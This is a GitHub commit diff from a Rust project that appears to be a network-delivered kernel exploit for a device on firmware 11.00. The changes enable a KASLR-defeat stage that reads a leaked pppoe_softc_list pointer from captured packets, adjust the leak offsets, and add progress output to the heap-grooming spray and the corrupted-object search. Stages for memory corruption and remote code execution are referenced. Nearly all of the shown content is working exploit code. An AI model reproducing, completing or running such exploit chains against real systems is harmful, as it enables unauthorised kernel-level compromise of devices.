Found same corrupted obj and same kaslr offset on pcap

fedebuonco · Oct 18, 2024 · b5a8647 · b5a8647
1 parent 8bd19ab
commit b5a8647
Show file tree

Hide file tree

Showing 2 changed files with 36 additions and 30 deletions.
diff --git a/src/exploit/mod.rs b/src/exploit/mod.rs
@@ -1,5 +1,6 @@
 // Import the constants module
 use crate::constants;
+use std::io::{self, Write};
 
 // Import and re-export only what needs to be re exported.
 mod lcp_echo_handler;
@@ -291,35 +292,35 @@ impl Exploit {
             }
         }
     }
-}
 
-pub fn defeat_kaslr(interface: &NetworkInterface) {
-    let (mut tx, mut rx) = create_ethernet_channel(interface).unwrap();
-    let packet = listen_for_packet(rx.as_mut(), is_icmpv6_nd_ns).unwrap();
-    // Extract the ICMPv6 payload and parse the relevant field
-    if let Some(pppoe_softc_list) = extract_pppoe_softc_list(&packet) {
-        println!("[+] pppoe_softc_list: {:#x}", pppoe_softc_list);
-
-        // Calculate the KASLR offset
-        let kaslr_offset = pppoe_softc_list.wrapping_sub(OFFSETS_FW_1100.pppoe_softc_list); //TODO offset from firmware
-        println!("[+] kaslr_offset: {:#x}", kaslr_offset);
-
-        // Validate the leak based on address comparison
-        if (pppoe_softc_list & 0xffffffff00000fff)
-            != (OFFSETS_FW_1100.pppoe_softc_list & 0xffffffff00000fff)
-        {
-            println!("[-] Error leak is invalid. Wrong firmware?");
+    pub fn defeat_kaslr(&mut self, interface: &NetworkInterface) {
+        let (mut tx, mut rx) = create_ethernet_channel(interface).unwrap();
+        let packet = listen_for_packet(rx.as_mut(), is_icmpv6_nd_ns).unwrap();
+        // Extract the ICMPv6 payload and parse the relevant field
+        if let Some(pppoe_softc_list) = extract_pppoe_softc_list(&packet) {
+            println!("[+] pppoe_softc_list: {:#x}", pppoe_softc_list);
+
+            // Calculate the KASLR offset
+            let kaslr_offset = pppoe_softc_list.wrapping_sub(OFFSETS_FW_1100.pppoe_softc_list); //TODO offset from firmware
+            println!("[+] kaslr_offset: {:#x}", kaslr_offset);
+
+            // Validate the leak based on address comparison
+            if (pppoe_softc_list & 0xffffffff00000fff)
+                != (OFFSETS_FW_1100.pppoe_softc_list & 0xffffffff00000fff)
+            {
+                println!("[-] Error leak is invalid. Wrong firmware?");
+                process::exit(1);
+            }
+        } else {
+            println!("[-] Failed to extract pppoe_softc_list");
             process::exit(1);
         }
-    } else {
-        println!("[-] Failed to extract pppoe_softc_list");
-        process::exit(1);
     }
 }
 
 fn extract_pppoe_softc_list(packet: &[u8]) -> Option<u64> {
     if packet.len() >= 0x4b {
-        let bytes = &packet[0x43..0x4b];
+        let bytes = &packet[0x51..0x59];
         // Convert the extracted bytes into a 64-bit integer (little-endian)
         let mut arr = [0u8; 8];
         arr[..bytes.len()].copy_from_slice(bytes);
@@ -331,7 +332,10 @@ fn extract_pppoe_softc_list(packet: &[u8]) -> Option<u64> {
 
 fn pin_to_cpu_0(tx: &mut dyn DataLinkSender, source_mac: [u8; 6], target_mac: [u8; 6]) {
     for i in 0..constants::PIN_NUM {
-        println!("[+] Pinning to CPU 0...{:?}%", 100 * i / constants::PIN_NUM);
+        let progress = 100 * i / constants::PIN_NUM;
+        print!("\r[+] Pinning to CPU 0... {}%", progress);
+        io::stdout().flush().unwrap();
+
         // Create etherpacket
         let packet = ether::Builder::default()
             .source(source_mac.into())
@@ -395,12 +399,11 @@ fn search_for_corrupted_obj(
     target_v6: [u8; 16],
 ) -> Option<[u8; 16]> {
     for i in (0..constants::SPRAY_NUM).rev() {
-        println!(
-            "[+]Search for corrupted object at {:?}%",
-            100 * i / constants::SPRAY_NUM
-        );
+        let progress = 100 * i / constants::SPRAY_NUM;
+        print!("\r[+] Search for corrupted object at {}%", progress);
+        io::stdout().flush().unwrap();
+
         if i >= constants::HOLE_START && i % constants::HOLE_SPACE == 0 {
-            println!("[-]HOLE");
             continue;
         }
         let source_v6_string = format!("fe80::{:04x}:4141:4141:4141", i);
@@ -436,7 +439,11 @@ fn spray(
     target_v6: [u8; 16],
 ) {
     for i in 0..constants::SPRAY_NUM {
-        println!("[+] Heap Grooming at {:?}%", 100 * i / constants::SPRAY_NUM);
+        let progress = 100 * i / constants::SPRAY_NUM;
+        // Print progress in place using carriage return
+        print!("\r[+] Heap Grooming at {}%", progress);
+        io::stdout().flush().unwrap();
+
         let source_v6_string = format!("fe80::{:04x}:4141:4141:4141", i);
         let source_v6: [u8; 16] = std::net::Ipv6Addr::from_str(&source_v6_string)
             .expect("Failed to parse IPv6 address")
@@ -450,7 +457,6 @@ fn spray(
         //  Wait for response for each req
         let _result = listen_for_packet(rx, is_icmpv6_nd_ns);
         if i >= constants::HOLE_START && i % constants::HOLE_SPACE == 0 {
-            println!("[-]HOLE");
             continue;
         }
         //  Sends advertisment only to certain response to create hole in the target heap

diff --git a/src/main.rs b/src/main.rs
@@ -35,7 +35,7 @@ fn run_exploit(interface_name: String) {
     println!("[+] STAGE 1: Memory corruption");
     expl.memory_corruption(&interface);
     println!("[+] STAGE 2: KASLR defeat");
-    // expl.defeat_kaslr(&interface);
+    expl.defeat_kaslr(&interface);
     println!("[+] STAGE 3: Remote code execution");
     // expl.ppp_negotiation(&interface);
     // expl.lcp_negotiation(&interface);